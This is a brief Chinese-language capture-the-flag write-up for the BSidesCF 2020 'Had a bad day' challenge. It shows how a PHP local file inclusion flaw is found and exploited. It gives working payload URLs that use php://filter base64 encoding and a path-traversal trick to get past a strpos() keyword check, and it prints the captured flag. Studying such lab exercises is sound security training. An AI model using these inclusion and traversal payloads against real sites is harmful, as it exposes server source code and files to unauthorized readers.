[BSidesCF 2020]Had a bad day
1.一看题目直接尝试文件包含
2.直接报错,确实是存在文件包含漏洞
http://307b4461-36d6-443f-879a-68803a57f721.node5.buuoj.cn:81/index.php?category=php://filter/convert.base64-encode/resource=index
strpos()
函数查找字符串在另一字符串中第一次出现的位置(区分大小写)。
注释:strpos()
函数是区分大小写的。
注释:该函数是二进制安全的。
3.说明输入的参数必须含有woofers
,meowers
,index
http://307b4461-36d6-443f-879a-68803a57f721.node5.buuoj.cn:81/index.php?category=php://filter/convert.base64-encode/resource=index…/…/flag
4.成功得到flag
flag{558a1dc9-78a9-41bc-9833-e3168ad731b2}